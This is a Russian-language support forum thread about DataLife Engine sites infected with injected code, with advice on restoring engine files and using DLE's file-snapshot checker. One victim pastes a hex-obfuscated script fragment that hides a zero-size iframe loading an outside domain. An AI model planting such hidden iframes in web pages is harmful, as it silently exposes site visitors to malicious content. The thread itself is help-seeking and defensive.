Перейти к публикации

Рекомендованные сообщения

warning85,

вы не просто заменили, вы удалили все данные настроек скрипта. Восстановите файлы в папке engine/data/

Ссылка на сообщение
Поделиться на других сайтах

Что-же тут написанно?

hpgxusvlwuzz"3C696672616D65207372633D22687474703A2F2F746F703130302D636F756E7465722E636F6D

2F746F703130302F696E6465782E70687022206672616D65626F726465723D22302220626F726465

723D2230222077696474683D22302

2206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207

669736962696C6974793A2068696464656E3B

20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script>

А вот:

<?php


?><?php wp_footer(); ?>


<div class="center-widget-title"></div>

<div class="center-widget">


<div class="footer"> 

<p>Copyright © <a href="<?php echo get_settings('home'); ?>"> 

<?php bloginfo('name'); ?>

</div> <!-- footer -->

</div> <!-- Center Widget -->

</div> <!-- page -->

</body>

</html><?php


?>

Ссылка на сообщение
Поделиться на других сайтах
  • 1 год спустя...

Langly

перезалейте все файлы дистрибутива в папке /engine/

А можно как для новичка на этом моменте поподробней. При заходе к провайдеру я вижу 2 папки engine одно в html-public и вторая в папке www их надо перезалить обе?

Ссылка на сообщение
Поделиться на других сайтах

А можно как для новичка на этом моменте поподробней. При заходе к провайдеру я вижу 2 папки engine одно в html-public и вторая в папке www их надо перезалить обе?

Можно, но необходимо сначала выполнять правила форума

Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.
Ссылка на сообщение
Поделиться на других сайтах

хорошо. Спасибо за ответ. Жду денег. Как только появятся (в течении 1- 1,5 недели) куплю у Вас лицензию и буду задалбывать вопросами уже официально :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах
  • 9 месяцев спустя...

Старнно, было изменено 196 файлов .js, при этом штатный антивирус мне показал 8 файлов и только те, что я добавил сам. Это по причине, что после установки я не делал снимок файлов?

Ссылка на сообщение
Поделиться на других сайтах

komnervov,

Не сделав снимок DLE не показывает изменений в файлах, а показывает только наличие файлов которые не входят в дистрибутив.

Ссылка на сообщение
Поделиться на других сайтах

не для всех, но для некоторых будет открытием, что для поиска сторонних файлов, шеллов, внесенных изменений в файлы дистрибутива и т.д. - в dle есть хороший инструмент - Антивирус.

по сути это не какой не антивирус, он не анализирует алгоритм работы кода в файлах на его вредоносность и не сранивает с какими-либо антивирусными базами.

он сравнивает файлы до снимка и после и показывает разницу, все. он покажет если был залит шелл (сторонний файл), он покажет если были внесены изменения в код движка, он покажет, если были внесены изменения в файлы шаблона, он даже покажет если были изменения в ваших сторонних модулях.

все что нужно - это после того, как вы залили движок на сервер, настроили, слепили шаблон, установили какие-то свои модули, вообщем дошли до момента, когда все, к кишкам сайта более притрагиваться не нужно и вы уверены в чистоте всего вашего проекта - делаете снимок. далее - только периодически заходите в панель и жмете на антивирус, наблюдаете карину маслом. ПС. жать на "Провести тщательное сканирование" не нужно!!! данное действие собьет ваш снимок и сравнит все файлы с оригиналом движка!!!

вообщем не стесняйтесь пользоваться, и не будет криков: "где мне что искать", "я уже перелопатил 196 файлов, что мне делать?" и т.д.

Изменено пользователем RedRoll
Ссылка на сообщение
Поделиться на других сайтах
  • 2 месяца спустя...

Всем доброго времени суток!

Сайт: http://triverclan.ru/

Проблема: все время пролезает iframe в файл main.tpl в конец шаблона.

Скажите пожалуйста, а может вирусня пролезать через картинки, вставленные в новости? Дело в том, что они загружены не на свой сервер, а берутся из разных мест с безграничных просторов.

Забодался искать причину. Снимок показывает, что меняется файл main.tpl, а мне это ни о чем не говорит.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...